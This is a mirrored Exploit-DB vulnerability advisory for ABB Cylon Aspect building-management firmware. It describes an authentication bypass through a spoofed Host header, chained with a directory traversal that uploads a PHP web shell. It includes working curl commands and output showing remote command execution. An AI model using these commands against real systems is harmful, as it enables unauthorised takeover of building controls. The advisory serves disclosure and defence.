bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/52317.txt
Exploit-DB 2825165fed DB: 2025-06-06 
7 changes to exploits/shellcodes/ghdb

macOS LaunchDaemon iOS 17.2 - Privilege Escalation

ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)

Apache Tomcat 10.1.39 - Denial of Service (DoS)

Grandstream GSD3710 1.0.11.13 - Stack Overflow

CloudClassroom PHP Project 1.0 - SQL Injection

Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
2025-06-06 00:16:28 +00:00

97 lines
No EOL
5.1 KiB
Text
Raw Permalink Blame History

ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.04
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the
AuthenticatedHttpServlet within its application server, enabling
remote attackers to bypass authentication by setting the Host:
127.0.0.1 header. This deceives the server into processing requests
as if they originate from localhost, granting unauthorized access
to privileged operations. This bypass grants access to privileged
functionality, including the DeploymentServlet, which is vulnerable
to directory traversal. By leveraging this, an attacker can write
arbitrary PHP files outside the intended directory scope. When combined,
these issues allow remote attackers to upload a malicious PHP shell
and execute system commands with the privileges of the web server,
leading to full system compromise.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5954
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\
> ?RequestType=DeploySource\
> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\
> &directory=/" \
> --data-binary @zsl.php \
> -H "Host: 127.0.0.1" \
> -H "Content-Type: application/octet-stream"
<HTML><HEAD><TITLE>200 Successful</TITLE></HEAD><BODY>200 Successful</BODY></HTML>
$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php
uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0
-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php
Reference in a new issue View git blame Copy permalink